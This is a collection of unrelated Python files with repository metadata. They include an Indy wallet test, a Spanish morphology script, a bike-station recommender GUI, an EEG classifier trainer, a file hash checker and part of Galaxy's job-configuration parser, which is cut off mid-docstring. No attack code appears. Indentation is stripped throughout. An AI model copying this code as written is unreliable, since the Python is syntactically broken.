def test_restore_agent_wallets_from_minimal_go_live(tdirWithPoolTxns):
source_dir = os.path.dirname(os.path.realpath(__file__))
agent_wallet_source_path = os.path.join(
source_dir, 'agent_wallet_from_minimal_go_live')
issuer_wallet_source_path = os.path.join(
source_dir, 'issuer_wallet_from_minimal_go_live')
config = getConfig(tdirWithPoolTxns)
agent_wallets_dir = os.path.join(config.CLI_BASE_DIR, config.walletsDir,
'agents', 'test-agent')
issuer_wallet_dir = os.path.join(agent_wallets_dir, 'issuer')
os.makedirs(issuer_wallet_dir)
shutil.copy(agent_wallet_source_path,
os.path.join(agent_wallets_dir, 'default.wallet'))
shutil.copy(issuer_wallet_source_path,
os.path.join(issuer_wallet_dir, 'issuer.wallet'))
client = TestClient('test-client',
ha=genHa(),
basedirpath=tdirWithPoolTxns)
agent = WalletedAgent('test-agent',
basedirpath=tdirWithPoolTxns,
client=client)
agent_wallet = agent.wallet
assert isinstance(agent_wallet, Wallet)
agent_connections = agent_wallet.getConnectionNames()
assert len(agent_connections) == 3
assert 'Acme Corp' in agent_connections
assert 'Faber College' in agent_connections
assert 'Thrift Bank' in agent_connections
issuer_wallet = agent.issuer.wallet
assert isinstance(issuer_wallet, IndyIssuerWalletInMemory)
assert isinstance(issuer_wallet._repo, IndyPublicRepo)
assert isinstance(issuer_wallet._repo.wallet, Wallet)
issuer_connections = issuer_wallet._repo.wallet.getConnectionNames()
assert len(issuer_connections) == 3
assert 'Acme Corp' in issuer_connections
assert 'Faber College' in issuer_connections
assert 'Thrift Bank' in issuer_connections
|
[
"alexander.sherbakov@dsr-company.com"
] |
alexander.sherbakov@dsr-company.com
|
43afce7b0e3fae4644204ede82202e1ae5a28b16
|
633546536aa4fe5566132c2c3407d673280abd87
|
/programas5-spa/programa-5-2.py
|
3551154a68747f2c29a966f455581e31d73011ab
|
[] |
no_license
|
aoliverg/python
|
dbcaa823b8b84fd6b769c2f1f8f7f6525c307ba8
|
6562a4422f1b18894a82f484bfa443d489880eb9
|
refs/heads/master
| 2023-03-06T17:02:32.749467
| 2021-02-13T12:11:03
| 2021-02-13T12:11:03
| 294,938,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
freglas=open("reglas.txt","r")
reglas=[]
while True:
linea=freglas.readline().rstrip()
if not linea:break
reglas.append(linea)
freglas.close()
fdiccionario=open("diccionario.txt","r")
while True:
linea=fdiccionario.readline().rstrip()
if not linea:break
(lema,tipo)=linea.split(":")
for regla in reglas:
(tf,tl,etiqueta,tipo2)=regla.split(":")
if ((tipo2 == tipo)&(lema.endswith(tl))):
print(lema[0:(len(lema)-len(tl))]+tf,lema,etiqueta)
fdiccionario.close()
|
[
"aoliverg@uoc.edu"
] |
aoliverg@uoc.edu
|
5589f7ffc74fc2142a33e4fa79fcad95a8313766
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_150/ch5_2020_03_17_15_11_34_348553.py
|
92239ab555449c872530a273fdcd1e75e9c8ca77
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
def libras_para_kg(libras):
kilograma = libras / 2.2046
return round(kilograma, 6)
|
[
"you@example.com"
] |
you@example.com
|
27d66697edb600f44c2bcbbecb60b39672cf4605
|
004572785d95142d4639eec6b3f058ea8accc5f1
|
/App dev files/App_code.py
|
912bab7af881fb62e75533b4d6ac0271dc42b185
|
[] |
no_license
|
aagarwal4/bay-area-bike-share
|
cd8f8d48813759d2faecf13031d3f3fb220abbd0
|
06cd888b141e6671214dbf03d6896a8b2e03b902
|
refs/heads/master
| 2021-09-09T02:07:58.966351
| 2018-03-13T09:51:44
| 2018-03-13T09:51:44
| 117,250,856
| 0
| 4
| null | 2018-03-13T09:51:45
| 2018-01-12T14:32:31
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,355
|
py
|
from Tkinter import Tk, Label, Button
from Tkinter import *
import requests
import csv
import geopy.distance
import pandas as pd
import urllib
import simplejson
try:
import Tkinter as tk
import tkFont
import ttk
except ImportError: # Python 3
import tkinter as tk
import tkinter.font as tkFont
import tkinter.ttk as ttk
fields = ['Hour', 'Date']
OPTIONS = [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 ,12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
['01-19-2018', '01-20-2018', '01-21-2018', '01-22-2018', '01-23-2018', '01-24-2018']]
def app_lookup(vals):
#address = raw_input("Enter your address: ")
#address = "101 Howard Street, San Francisco"
address = vals[0]
api_key = "***"  # placeholder; real key redacted
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(address, api_key))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude = api_response_dict['results'][0]['geometry']['location']['lat']
longitude = api_response_dict['results'][0]['geometry']['location']['lng']
mylist = []
with open('station.csv','rb') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
mylist.append(tuple(row[1:4]))
station_google_info = pd.DataFrame(columns = ['station_name','distance','duration', 'distance_value'])
for station in mylist[1:]:
url = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins={0}&destinations={1}&key={2}&mode=walking'.format(str(latitude)+','+str(longitude), str(station[1])+','+str(station[2]), api_key)
distance_response_dict = simplejson.load(urllib.urlopen(url))
if distance_response_dict['status'] == 'OK':
station_google_info = station_google_info.append({'station_name': station[0], 'distance': distance_response_dict['rows'][0]['elements'][0]['distance']['text'],
'duration':distance_response_dict['rows'][0]['elements'][0]['duration']['text'],
'distance_value': distance_response_dict['rows'][0]['elements'][0]['distance']['value']}, ignore_index=True)
stations_df = station_google_info.sort_values('distance_value', ascending = 1).head()
df = pd.read_csv("Predictions.csv")
filtered_df = df[(df['station_name'].isin(stations_df['station_name'])) & (df['hour'] == int(vals[1])) & (df['date'] == vals[2])]
filtered_df = filtered_df.join(stations_df.set_index('station_name'), on = 'station_name').sort_values('metric', ascending = 0)
filtered_df['rank'] = range(1,len(filtered_df)+1)
return filtered_df[['rank', 'station_name', 'distance', 'duration', 'metric']]
def makeform(root, fields, OPTIONS):
entries = []
row = Frame(root)
lab = Label(row, width=15, text='Location', anchor='w')
ent = Entry(row)
row.pack(side=TOP, fill=X, padx=5, pady=5)
lab.pack(side=LEFT)
ent.pack(side=RIGHT, expand=YES, fill=X)
entries.append(('Location', ent))
for i in range(0, 2):
variable = StringVar(root)
variable.set(OPTIONS[i][0]) # default value
row = Frame(root)
lab = Label(row, width=15, text=fields[i], anchor='w')
lab.pack(side=LEFT)
w = OptionMenu(row, variable, *OPTIONS[i])
w.pack(side=LEFT)
row.pack(side=TOP, fill=X, padx=5, pady=5)
entries.append((fields[i], variable))
#val = variable.get()
return entries
def fetch(entries):
#global entries
vals = []
for entry in entries:
field = entry[0]
text = entry[1].get()
print('%s: "%s"' % (field, text))
vals.append(text)
if vals[0] != "":
df = app_lookup(vals)
print vals[0]
# car_header = list(df.columns.values)
print df
car_list = [tuple(row[1]) for row in df.iterrows()]
for col in car_header:
tree.heading(col, text=col.title())
for item in car_list:
tree.insert('', 'end', values=item)
return vals
def reset_station():
# listbox.delete(0, END)
#listbox.insert(END, '')
tree.delete(*tree.get_children())
if __name__ == '__main__':
root = Tk()
Label(root, text = "GoBike Station Recommendation", fg = "blue", font = "Verdana 20 bold").pack()
# listbox = Listbox(root, width = 150, height = 10)
# listbox.pack(expand = True)
ents = makeform(root, fields, OPTIONS)
root.bind('<Return>', (lambda event, e=ents: fetch(e)))
global vals
vals = fetch(ents)
print vals
fm = Frame(root)
b1 = Button(fm, text='Show', command=(lambda e=ents: fetch(e)))
b1.pack(side=LEFT, padx=5, pady=5)
# lb = Listbox(root)
b = Button(fm, text="Reset",
command=reset_station)
b.pack(side=LEFT, padx=5, pady=5)
fm.pack(fill=BOTH, expand = YES)
car_header = ['rank', 'station_name', 'distance', 'duration', 'metric']
root.title("GoApp")
container = ttk.Frame()
container.pack(fill='both', expand=True)
tree = ttk.Treeview(columns=car_header, show="headings")
tree.grid(column=0, row=0, sticky='nsew', in_=container)
container.grid_columnconfigure(0, weight=1)
container.grid_rowconfigure(0, weight=1)
root.mainloop()
|
[
"djohn@dons.usfca.edu"
] |
djohn@dons.usfca.edu
|
2fa288aea4a3deb75788391f00ca6fa38d7e4d35
|
a7defc517f9a007425ac411468169e6177b0186c
|
/learntools/emotiv/skmodel.py
|
313df15ddbc006cae6d9d7d994383893950b962e
|
[
"MIT"
] |
permissive
|
yueranyuan/vector_edu
|
6f9b9b6a26b1a9c0aa95f2da752fd532c4c22186
|
259ff50479ebd5e12136554f1cd47bff149fa15c
|
refs/heads/master
| 2016-09-05T15:41:31.135701
| 2015-06-06T15:00:42
| 2015-06-06T15:00:42
| 27,746,530
| 3
| 3
| null | 2015-03-07T03:04:20
| 2014-12-09T02:51:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,497
|
py
|
from __future__ import division
import numpy as np
from sklearn.decomposition import PCA
from learntools.libs.logger import log
from learntools.model import Model
from learntools.libs.auc import auc
class SKModel(Model):
def __init__(self, prepared_data, classifier, pca_components=None, pca_percentage=None, **kwargs):
# 1: Organize data into batches
ds, train_idx, valid_idx = prepared_data
xs = ds.get_data('eeg')
ys = ds.get_data('condition')
self.train_x = xs[train_idx]
self.train_y = ys[train_idx]
self.valid_x = xs[valid_idx]
self.valid_y = ys[valid_idx]
self.c = classifier
# setup PCA
if pca_percentage:
pca_components = self.train_x.shape[1] * pca_percentage
if pca_components:
self.pca = PCA(n_components=pca_components)
else:
self.pca = None
def train_full(self, strategy=None, **kwargs):
return super(SKModel, self).train_full(strategy=train_skmodel)
def serialize(self):
return self.c
def predict(self, x):
return self.c.predict(x)
@property
def validation_predictions(self):
return self.predict(self.valid_x)
def train_skmodel(model, average_n_predictions=None, binarize=False, **kwargs):
train_x = model.train_x
valid_x = model.valid_x
if model.pca:
train_x = model.pca.fit_transform(train_x)
valid_x = model.pca.transform(valid_x)
model.c.fit(train_x, model.train_y)
preds = model.c.predict(valid_x)
if average_n_predictions:
correct = 0
incorrect = 0
for y in np.unique(model.valid_y):
y_preds = preds[np.where(model.valid_y == y)]
for i in xrange(0, len(y_preds), average_n_predictions):
if sum(y_preds[i:(i + average_n_predictions)] == y) > (average_n_predictions / 2):
correct += 1
else:
incorrect += 1
acc = correct / (correct + incorrect)
else:
acc = sum(np.equal(preds, model.valid_y)) / len(preds)
_auc = auc(model.valid_y[:len(preds)], preds, pos_label=1)
if binarize:
binary_preds = np.greater_equal(preds, np.median(preds))
acc = sum(np.equal(binary_preds, model.valid_y)) / len(binary_preds)
print("validation auc: {auc}".format(auc=_auc))
log('epoch 0, validation accuracy {acc:.2%}'.format(acc=acc), True)
return acc, 0, model.serialize()
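# Illustrative note (not part of the original file): when average_n_predictions is set,
# validation predictions are scored by majority vote over consecutive chunks of that size
# within each true class. A made-up example with average_n_predictions = 3:
#
# predictions where the true label is 1: [1, 1, 0, 1, 0, 0]
# chunk [1, 1, 0] -> two of three equal 1 -> counted correct
# chunk [1, 0, 0] -> one of three equal 1 -> counted incorrect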
|
[
"yueranyuan@gmail.com"
] |
yueranyuan@gmail.com
|
e566c940bc12de675b66c189fc4527197db9b8bb
|
e8f67b90173daccb794bf3959f2b27742dc129ef
|
/HashValidator.py
|
5c276afe2f426f329339954a8ef7dfb4bb481854
|
[] |
no_license
|
kostas-pa/HashValidator
|
52fc2815e62d08fbefc75019fa3fc4db06d92480
|
784a19c421993060a6518cbf341dad5ce3ceee56
|
refs/heads/main
| 2023-08-05T19:53:37.124108
| 2021-09-27T10:25:43
| 2021-09-27T10:25:43
| 348,281,820
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
#!/usr/bin/env python
import sys
import os.path
from os import path
import hashlib
import tkinter as tk
from tkinter import filedialog
hashes = list(hashlib.algorithms_guaranteed)
block_size = 65536  # The size of each read from the file
root = tk.Tk()
root.withdraw()
filename = filedialog.askopenfilename()
def menu():
num = 0
print("\n-----------Initial Menu-----------")
for i in hashes:
print(str(num) + ") " + i.upper())
num +=1
def main():
if path.exists(filename):
menu()
choice = int(input("Please type your choice (number): "))
inputhash = str(input("Please type the hash you want to check: "))
if choice < 0 or choice >= len(hashes):
print("\nInvalid input!!!")
sys.exit()
checksum = hashlib.new(hashes[choice])
with open(filename, 'rb') as f:
hashUpdate = f.read(block_size)
while len(hashUpdate) > 0:
checksum.update(hashUpdate)
hashUpdate = f.read(block_size)
print(checksum.hexdigest())
print(inputhash)
if checksum.hexdigest().lower().strip() == inputhash.lower().strip():
print("\n[+] The hashes match. The file is intact!!!")
else:
print("\n[-] The hashes do not match. The file has been tampered!!!")
else:
print("[-] " + str(filename) + "path not found")
sys.exit()
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
kostas-pa.noreply@github.com
|
1af8914408d2e13a9171f9a975afddaad28bad1f
|
28e16491dbddefeef482f515bb84f8cbf619929a
|
/lib/galaxy/jobs/__init__.py
|
159c0dd340d7451e1f71fcde42245ca54e07a52c
|
[
"CC-BY-2.5",
"AFL-2.1",
"AFL-3.0",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hidelab/galaxy-central-hpc
|
a9e469829cdcfa4adf8fcbcc178534d5e2dccf0b
|
75539db90abe90377db95718f83cafa7cfa43301
|
refs/heads/master
| 2021-01-23T10:20:57.837042
| 2017-09-06T14:15:46
| 2017-09-06T14:15:46
| 102,609,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87,784
|
py
|
"""
Support for running a tool in Galaxy via an internal job management system
"""
from abc import ABCMeta
from abc import abstractmethod
import time
import copy
import datetime
import galaxy
import logging
import os
import pwd
import random
import re
import shutil
import subprocess
import sys
import traceback
from galaxy import model, util
from galaxy.datatypes import metadata
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.jobs.actions.post import ActionBox
from galaxy.jobs.mapper import JobRunnerMapper
from galaxy.jobs.runners import BaseJobRunner, JobState
from galaxy.util.bunch import Bunch
from galaxy.util.expressions import ExpressionContext
from galaxy.util.json import from_json_string
from galaxy.util import unicodify
from .output_checker import check_output
from .datasets import TaskPathRewriter
from .datasets import OutputsToWorkingDirectoryPathRewriter
from .datasets import NullDatasetPathRewriter
from .datasets import DatasetPath
log = logging.getLogger( __name__ )
DATABASE_MAX_STRING_SIZE = util.DATABASE_MAX_STRING_SIZE
DATABASE_MAX_STRING_SIZE_PRETTY = util.DATABASE_MAX_STRING_SIZE_PRETTY
# This file, if created in the job's working directory, will be used for
# setting advanced metadata properties on the job and its associated outputs.
# This interface is currently experimental, is only used by the upload tool,
# and should eventually become API'd
TOOL_PROVIDED_JOB_METADATA_FILE = 'galaxy.json'
class JobDestination( Bunch ):
"""
Provides details about where a job runs
"""
def __init__(self, **kwds):
self['id'] = None
self['url'] = None
self['tags'] = None
self['runner'] = None
self['legacy'] = False
self['converted'] = False
self['env'] = []
self['resubmit'] = []
# dict is appropriate (rather than a bunch) since keys may not be valid as attributes
self['params'] = dict()
# Use the values persisted in an existing job
if 'from_job' in kwds and kwds['from_job'].destination_id is not None:
self['id'] = kwds['from_job'].destination_id
self['params'] = kwds['from_job'].destination_params
super(JobDestination, self).__init__(**kwds)
# Store tags as a list
if self.tags is not None:
self['tags'] = [ x.strip() for x in self.tags.split(',') ]
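# Illustrative example (not part of Galaxy itself): constructing a destination directly
# shows how the comma-separated "tags" string is normalized; the id/runner values below
# are made up.
#
# dest = JobDestination(id='cluster_default', runner='drmaa', tags='longjobs, bigmem')
# dest.tags    # -> ['longjobs', 'bigmem']
# dest.params  # -> {} until filled in by the job configuration parser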
class JobToolConfiguration( Bunch ):
"""
Provides details on what handler and destination a tool should use
A JobToolConfiguration will have the required attribute 'id' and optional
attributes 'handler', 'destination', and 'params'
"""
def __init__(self, **kwds):
self['handler'] = None
self['destination'] = None
self['params'] = dict()
super(JobToolConfiguration, self).__init__(**kwds)
def get_resource_group( self ):
return self.get( "resources", None )
class JobConfiguration( object ):
"""A parser and interface to advanced job management features.
These features are configured in the job configuration, by default, ``job_conf.xml``
"""
DEFAULT_NWORKERS = 4
def __init__(self, app):
"""Parse the job configuration XML.
"""
self.app = app
self.runner_plugins = []
self.handlers = {}
self.handler_runner_plugins = {}
self.default_handler_id = None
self.destinations = {}
self.destination_tags = {}
self.default_destination_id = None
self.tools = {}
self.resource_groups = {}
self.default_resource_group = None
self.resource_parameters = {}
self.limits = Bunch()
self.__parse_resource_parameters()
# Initialize the config
try:
tree = util.parse_xml(self.app.config.job_config_file)
self.__parse_job_conf_xml(tree)
except IOError:
log.warning( 'Job configuration "%s" does not exist, using legacy job configuration from Galaxy config file "%s" instead' % ( self.app.config.job_config_file, self.app.config.config_file ) )
self.__parse_job_conf_legacy()
def __parse_job_conf_xml(self, tree):
"""Loads the new-style job configuration from options in the job config file (by default, job_conf.xml).
:param tree: Object representing the root ``<job_conf>`` object in the job config file.
:type tree: ``xml.etree.ElementTree.Element``
"""
root = tree.getroot()
log.debug('Loading job configuration from %s' % self.app.config.job_config_file)
# Parse job plugins
plugins = root.find('plugins')
if plugins is not None:
for plugin in self.__findall_with_required(plugins, 'plugin', ('id', 'type', 'load')):
if plugin.get('type') == 'runner':
workers = plugin.get('workers', plugins.get('workers', JobConfiguration.DEFAULT_NWORKERS))
runner_kwds = self.__get_params(plugin)
runner_info = dict(id=plugin.get('id'),
load=plugin.get('load'),
workers=int(workers),
kwds=runner_kwds)
self.runner_plugins.append(runner_info)
else:
log.error('Unknown plugin type: %s' % plugin.get('type'))
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
# Parse handlers
handlers = root.find('handlers')
if handlers is not None:
for handler in self.__findall_with_required(handlers, 'handler'):
id = handler.get('id')
if id in self.handlers:
log.error("Handler '%s' overlaps handler with the same name, ignoring" % id)
else:
log.debug("Read definition for handler '%s'" % id)
self.handlers[id] = (id,)
for plugin in handler.findall('plugin'):
if id not in self.handler_runner_plugins:
self.handler_runner_plugins[id] = []
self.handler_runner_plugins[id].append( plugin.get('id') )
if handler.get('tags', None) is not None:
for tag in [ x.strip() for x in handler.get('tags').split(',') ]:
if tag in self.handlers:
self.handlers[tag].append(id)
else:
self.handlers[tag] = [id]
# Determine the default handler(s)
self.default_handler_id = self.__get_default(handlers, self.handlers.keys())
# Parse destinations
destinations = root.find('destinations')
job_metrics = self.app.job_metrics
for destination in self.__findall_with_required(destinations, 'destination', ('id', 'runner')):
id = destination.get('id')
destination_metrics = destination.get( "metrics", None )
if destination_metrics:
if not util.asbool( destination_metrics ):
# disable
job_metrics.set_destination_instrumenter( id, None )
else:
metrics_conf_path = self.app.config.resolve_path( destination_metrics )
job_metrics.set_destination_conf_file( id, metrics_conf_path )
else:
metrics_elements = self.__findall_with_required( destination, 'job_metrics', () )
if metrics_elements:
job_metrics.set_destination_conf_element( id, metrics_elements[ 0 ] )
job_destination = JobDestination(**dict(destination.items()))
job_destination['params'] = self.__get_params(destination)
job_destination['env'] = self.__get_envs(destination)
job_destination['resubmit'] = self.__get_resubmits(destination)
self.destinations[id] = (job_destination,)
if job_destination.tags is not None:
for tag in job_destination.tags:
if tag not in self.destinations:
self.destinations[tag] = []
self.destinations[tag].append(job_destination)
# Determine the default destination
self.default_destination_id = self.__get_default(destinations, self.destinations.keys())
# Parse resources...
resources = root.find('resources')
if resources is not None:
self.default_resource_group = resources.get( "default", None )
for group in self.__findall_with_required(resources, 'group'):
id = group.get('id')
fields_str = group.get('fields', None) or group.text or ''
fields = [ f for f in fields_str.split(",") if f ]
self.resource_groups[ id ] = fields
# Parse tool mappings
tools = root.find('tools')
if tools is not None:
for tool in self.__findall_with_required(tools, 'tool'):
# There can be multiple definitions with identical ids, but different params
id = tool.get('id').lower().rstrip('/')
if id not in self.tools:
self.tools[id] = list()
self.tools[id].append(JobToolConfiguration(**dict(tool.items())))
self.tools[id][-1]['params'] = self.__get_params(tool)
types = dict(registered_user_concurrent_jobs=int,
anonymous_user_concurrent_jobs=int,
walltime=str,
output_size=util.size_to_bytes)
self.limits = Bunch(registered_user_concurrent_jobs=None,
anonymous_user_concurrent_jobs=None,
walltime=None,
walltime_delta=None,
output_size=None,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
# Parse job limits
limits = root.find('limits')
if limits is not None:
for limit in self.__findall_with_required(limits, 'limit', ('type',)):
type = limit.get('type')
# concurrent_jobs renamed to destination_user_concurrent_jobs in job_conf.xml
if type in ( 'destination_user_concurrent_jobs', 'concurrent_jobs', 'destination_total_concurrent_jobs' ):
id = limit.get('tag', None) or limit.get('id')
if type == 'destination_total_concurrent_jobs':
self.limits.destination_total_concurrent_jobs[id] = int(limit.text)
else:
self.limits.destination_user_concurrent_jobs[id] = int(limit.text)
elif limit.text:
self.limits.__dict__[type] = types.get(type, str)(limit.text)
if self.limits.walltime is not None:
h, m, s = [ int( v ) for v in self.limits.walltime.split( ':' ) ]
self.limits.walltime_delta = datetime.timedelta( 0, s, 0, 0, m, h )
log.debug('Done loading job configuration')
def __parse_job_conf_legacy(self):
"""Loads the old-style job configuration from options in the galaxy config file (by default, universe_wsgi.ini).
"""
log.debug('Loading job configuration from %s' % self.app.config.config_file)
# Always load local and lwr
self.runner_plugins = [dict(id='local', load='local', workers=self.app.config.local_job_queue_workers), dict(id='lwr', load='lwr', workers=self.app.config.cluster_job_queue_workers)]
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
for runner in self.app.config.start_job_runners:
self.runner_plugins.append(dict(id=runner, load=runner, workers=self.app.config.cluster_job_queue_workers))
# Set the handlers
for id in self.app.config.job_handlers:
self.handlers[id] = (id,)
self.handlers['default_job_handlers'] = self.app.config.default_job_handlers
self.default_handler_id = 'default_job_handlers'
# Set tool handler configs
for id, tool_handlers in self.app.config.tool_handlers.items():
self.tools[id] = list()
for handler_config in tool_handlers:
# rename the 'name' key to 'handler'
handler_config['handler'] = handler_config.pop('name')
self.tools[id].append(JobToolConfiguration(**handler_config))
# Set tool runner configs
for id, tool_runners in self.app.config.tool_runners.items():
# Might have been created in the handler parsing above
if id not in self.tools:
self.tools[id] = list()
for runner_config in tool_runners:
url = runner_config['url']
if url not in self.destinations:
                    # Create a new "legacy" JobDestination - it will have its URL converted to destination params once the appropriate plugin has loaded
self.destinations[url] = (JobDestination(id=url, runner=url.split(':', 1)[0], url=url, legacy=True, converted=False),)
for tool_conf in self.tools[id]:
if tool_conf.params == runner_config.get('params', {}):
tool_conf['destination'] = url
break
else:
# There was not an existing config (from the handlers section) with the same params
# rename the 'url' key to 'destination'
runner_config['destination'] = runner_config.pop('url')
self.tools[id].append(JobToolConfiguration(**runner_config))
self.destinations[self.app.config.default_cluster_job_runner] = (JobDestination(id=self.app.config.default_cluster_job_runner, runner=self.app.config.default_cluster_job_runner.split(':', 1)[0], url=self.app.config.default_cluster_job_runner, legacy=True, converted=False),)
self.default_destination_id = self.app.config.default_cluster_job_runner
# Set the job limits
self.limits = Bunch(registered_user_concurrent_jobs=self.app.config.registered_user_job_limit,
anonymous_user_concurrent_jobs=self.app.config.anonymous_user_job_limit,
walltime=self.app.config.job_walltime,
walltime_delta=self.app.config.job_walltime_delta,
output_size=self.app.config.output_size_limit,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
log.debug('Done loading job configuration')
def get_tool_resource_parameters( self, tool_id ):
""" Given a tool id, return XML elements describing parameters to
insert into job resources.
        :param tool_id: A tool ID (a string)
:returns: List of parameter elements.
"""
fields = []
if not tool_id:
return fields
# TODO: Only works with exact matches, should handle different kinds of ids
# the way destination lookup does.
resource_group = None
if tool_id in self.tools:
resource_group = self.tools[ tool_id ][ 0 ].get_resource_group()
resource_group = resource_group or self.default_resource_group
if resource_group and resource_group in self.resource_groups:
fields_names = self.resource_groups[ resource_group ]
fields = [ self.resource_parameters[ n ] for n in fields_names ]
return fields
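    # Sketch of the lookup above with hypothetical names: given
    #   self.resource_groups == {'cluster_defaults': ['cores', 'memory']}
    # and a tool whose first JobToolConfiguration names the resource group
    # 'cluster_defaults', get_tool_resource_parameters(tool_id) returns the
    # <param> elements stored under 'cores' and 'memory' in
    # self.resource_parameters.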
def __parse_resource_parameters( self ):
if not os.path.exists( self.app.config.job_resource_params_file ):
return
resource_definitions = util.parse_xml( self.app.config.job_resource_params_file )
resource_definitions_root = resource_definitions.getroot()
# TODO: Also handling conditionals would be awesome!
for parameter_elem in resource_definitions_root.findall( "param" ):
name = parameter_elem.get( "name" )
# Considered prepending __job_resource_param__ here and then
# stripping it off when making it available to dynamic job
# destination. Not needed because resource parameters are wrapped
# in a conditional.
## expanded_name = "__job_resource_param__%s" % name
## parameter_elem.set( "name", expanded_name )
self.resource_parameters[ name ] = parameter_elem
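    # Hypothetical job_resource_params_file content matching the parsing
    # above - only top-level <param> elements are read, keyed by their
    # 'name' attribute (the root tag name and the other attributes shown
    # here are illustrative):
    #
    #   <parameters>
    #       <param label="Cores" name="cores" type="integer" value="1"/>
    #       <param label="Memory (GB)" name="memory" type="integer" value="4"/>
    #   </parameters>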
def __get_default(self, parent, names):
"""Returns the default attribute set in a parent tag like <handlers> or <destinations>, or return the ID of the child, if there is no explicit default and only one child.
:param parent: Object representing a tag that may or may not have a 'default' attribute.
:type parent: ``xml.etree.ElementTree.Element``
:param names: The list of destination or handler IDs or tags that were loaded.
:type names: list of str
:returns: str -- id or tag representing the default.
"""
rval = parent.get('default')
if rval is not None:
# If the parent element has a 'default' attribute, use the id or tag in that attribute
if rval not in names:
raise Exception("<%s> default attribute '%s' does not match a defined id or tag in a child element" % (parent.tag, rval))
log.debug("<%s> default set to child with id or tag '%s'" % (parent.tag, rval))
elif len(names) == 1:
log.info("Setting <%s> default to child with id '%s'" % (parent.tag, names[0]))
rval = names[0]
else:
raise Exception("No <%s> default specified, please specify a valid id or tag with the 'default' attribute" % parent.tag)
return rval
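    # Example of the resolution above (hypothetical ids): given
    #   <handlers default="handler0">...</handlers>
    # and names == ['handler0', 'handler1'], this returns 'handler0'. With no
    # 'default' attribute and names == ['only_handler'], it returns
    # 'only_handler'; with no default and several names, it raises.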
def __findall_with_required(self, parent, match, attribs=None):
"""Like ``xml.etree.ElementTree.Element.findall()``, except only returns children that have the specified attribs.
:param parent: Parent element in which to find.
:type parent: ``xml.etree.ElementTree.Element``
:param match: Name of child elements to find.
:type match: str
:param attribs: List of required attributes in children elements.
:type attribs: list of str
:returns: list of ``xml.etree.ElementTree.Element``
"""
rval = []
if attribs is None:
attribs = ('id',)
for elem in parent.findall(match):
for attrib in attribs:
if attrib not in elem.attrib:
log.warning("required '%s' attribute is missing from <%s> element" % (attrib, match))
break
else:
rval.append(elem)
return rval
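    # Example (hypothetical elements), with attribs=('id', 'runner'):
    #   <destination id="local" runner="local"/>  -> returned
    #   <destination id="incomplete"/>            -> skipped with a warning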
def __get_params(self, parent):
"""Parses any child <param> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <param> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = {}
for param in parent.findall('param'):
rval[param.get('id')] = param.text
return rval
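    # Example (hypothetical param): <param id="nativeSpecification">-q main.q</param>
    # yields {'nativeSpecification': '-q main.q'}.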
def __get_envs(self, parent):
"""Parses any child <env> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <env> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for param in parent.findall('env'):
rval.append( dict(
name=param.get('id'),
file=param.get('file'),
execute=param.get('exec'),
value=param.text,
raw=util.asbool(param.get('raw', 'false'))
) )
return rval
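    # Example (hypothetical values): <env id="PATH" raw="true">/opt/bin:$PATH</env>
    # yields [{'name': 'PATH', 'file': None, 'execute': None,
    #          'value': '/opt/bin:$PATH', 'raw': True}].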
def __get_resubmits(self, parent):
"""Parses any child <resubmit> tags in to a dictionary suitable for persistence.
:param parent: Parent element in which to find child <resubmit> tags.
:type parent: ``xml.etree.ElementTree.Element``
:returns: dict
"""
rval = []
for resubmit in parent.findall('resubmit'):
rval.append( dict(
condition=resubmit.get('condition'),
destination=resubmit.get('destination'),
handler=resubmit.get('handler')
) )
return rval
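    # Example (hypothetical values): <resubmit condition="walltime_reached" destination="longjobs"/>
    # yields [{'condition': 'walltime_reached', 'destination': 'longjobs', 'handler': None}].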
@property
def default_job_tool_configuration(self):
"""The default JobToolConfiguration, used if a tool does not have an explicit defintion in the configuration. It consists of a reference to the default handler and default destination.
:returns: JobToolConfiguration -- a representation of a <tool> element that uses the default handler and destination
"""
return JobToolConfiguration(id='default', handler=self.default_handler_id, destination=self.default_destination_id)
# Called upon instantiation of a Tool object
def get_job_tool_configurations(self, ids):
"""Get all configured JobToolConfigurations for a tool ID, or, if given a list of IDs, the JobToolConfigurations for the first id in ``ids`` matching a tool definition.
.. note::
You should not mix tool shed tool IDs, versionless tool shed IDs, and tool config tool IDs that refer to the same tool.
:param ids: Tool ID or IDs to fetch the JobToolConfiguration of.
:type ids: list or str.
:returns: list -- JobToolConfiguration Bunches representing <tool> elements matching the specified ID(s).
Example tool ID strings include:
* Full tool shed id: ``toolshed.example.org/repos/nate/filter_tool_repo/filter_tool/1.0.0``
